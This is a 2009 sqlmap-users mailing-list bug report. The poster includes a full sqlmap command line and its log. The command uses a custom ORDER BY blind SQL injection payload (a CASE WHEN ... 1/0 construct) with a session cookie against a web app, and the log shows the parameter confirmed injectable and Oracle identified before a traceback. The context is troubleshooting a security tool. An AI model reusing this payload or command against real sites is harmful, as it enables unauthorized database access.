[sqlmap-users] sqlmap error
Brought to you by:
inquisb
Menu
▾
▴
[sqlmap-users] sqlmap error
|
From: sql p. <sql...@go...> - 2009-06-22 13:10:14
|
Hi guys, I had the following error when running sqlmap. The error occured in version 0.6.4 and 0.7rc1. Note that I use prefix and postfix because the injection can only be done in an order by statement. In order by you cannot directly append "AND 1=1". The setup for sql injection works and was verified. Best Regards, Jan ./sqlmap.py -u " http://www.example.com/system/listinstances.nav?FORMULARNAME=listinstances&FORMULARSEGMENT=0&FLD_maxElementsListInstances=5&FLD_listInstancesOrderBy=1" -p FLD_listInstancesOrderBy --string=rowHighSmall --proxy= http://127.0.0.1:8080/--cookie="JSESSIONID=1RjDK1vK9NMkyJ7tWPWks9wTYyYz22h5pTQ2qTWVx6pQVhxC2nVg" --delay=1 --prefix="%2b(select%20case%20when%201=1" --postfix="then%201%20else%201/0%20end%20from%20dual)" --sql-query="select 'bla' from dual" /home/jan/Tools/sqlmap-0.6.4/lib/core/convert.py:27: DeprecationWarning: the md5 module is deprecated; use hashlib instead import md5 /home/jan/Tools/sqlmap-0.6.4/lib/core/convert.py:28: DeprecationWarning: the sha module is deprecated; use the hashlib module instead import sha sqlmap/0.6.4 coded by Bernardo Damele A. G. <ber...@gm...> and Daniele Bellucci <dan...@gm...> [*] starting at: 14:53:19 [14:53:19] [WARNING] the testable parameter 'FLD_listInstancesOrderBy' you provided is not into the Cookie [14:53:19] [INFO] testing connection to the target url [14:53:20] [INFO] testing if the provided string is within the target URL page content [14:53:22] [INPUT] you provided an HTTP Cookie header value. The target url provided its own Cookie within the HTTP Set-Cookie header. Do you want to continue using the HTTP Cookie values that you provided? [Y/n] Y [14:53:26] [INFO] testing if GET parameter 'FLD_listInstancesOrderBy' is dynamic [14:53:28] [INFO] confirming that GET parameter 'FLD_listInstancesOrderBy' is dynamic [14:53:31] [INFO] GET parameter 'FLD_listInstancesOrderBy' is dynamic [14:53:31] [INFO] testing sql injection on GET parameter 'FLD_listInstancesOrderBy' with 0 parenthesis [14:53:31] [INFO] testing custom injection on GET parameter 'FLD_listInstancesOrderBy' [14:53:35] [INFO] confirming custom injection on GET parameter 'FLD_listInstancesOrderBy' [14:53:37] [INFO] GET parameter 'FLD_listInstancesOrderBy' is custom injectable [14:53:37] [INFO] testing for parenthesis on injectable parameter [14:53:37] [INFO] testing MySQL [14:53:38] [WARNING] the back-end DMBS is not MySQL [14:53:38] [INFO] testing Oracle [14:53:41] [INFO] confirming Oracle [14:53:43] [INFO] the back-end DBMS is Oracle web application technology: Apache, Servlet 2.5, JSP, JSP 2.1 back-end DBMS: Oracle [14:53:43] [INFO] fetching SQL SELECT statement query output: 'select 'bla' from dual' [14:53:43] [INPUT] can the SQL query provided return multiple entries? [Y/n] n [14:53:47] [INFO] query: SELECT NVL(CAST(CHR(98)||CHR(108)||CHR(97) AS VARCHAR(4000)), CHR(32)) FROM dual [14:53:47] [INFO] retrieved: [14:53:47] [ERROR] unhandled exception in sqlmap/0.6.4, please copy the command line and the following text and send by e-mail to sql...@li.... The developers will fix it as soon as possible: sqlmap version: 0.6.4 Python version: 2.6.2 Operating system: linux2 Traceback (most recent call last): File "./sqlmap.py", line 81, in main start() File "/home/jan/Tools/sqlmap-0.6.4/lib/controller/controller.py", line 255, in start action() File "/home/jan/Tools/sqlmap-0.6.4/lib/controller/action.py", line 123, in action dumper.string(conf.query, conf.dbmsHandler.sqlQuery(conf.query)) File "/home/jan/Tools/sqlmap-0.6.4/plugins/generic/enumeration.py", line 1078, in sqlQuery output = inject.getValue(query, fromUser=True) File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 364, in getValue value = __goInferenceProxy(expression, fromUser, expected) File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 297, in __goInferenceProxy outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected) File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 100, in __goInferenceFields output = __goInference(payload, expressionReplaced) File "/home/jan/Tools/sqlmap-0.6.4/lib/request/inject.py", line 60, in __goInference count, value = bisection(payload, expression, length=length) File "/home/jan/Tools/sqlmap-0.6.4/lib/techniques/blind/inference.py", line 231, in bisection val = getChar(index) File "/home/jan/Tools/sqlmap-0.6.4/lib/techniques/blind/inference.py", line 101, in getChar forgedPayload = payload % (expressionUnescaped, idx, limit) ValueError: unsupported format character 'b' (0x62) at index 104 [*] shutting down at: 14:53:47 |
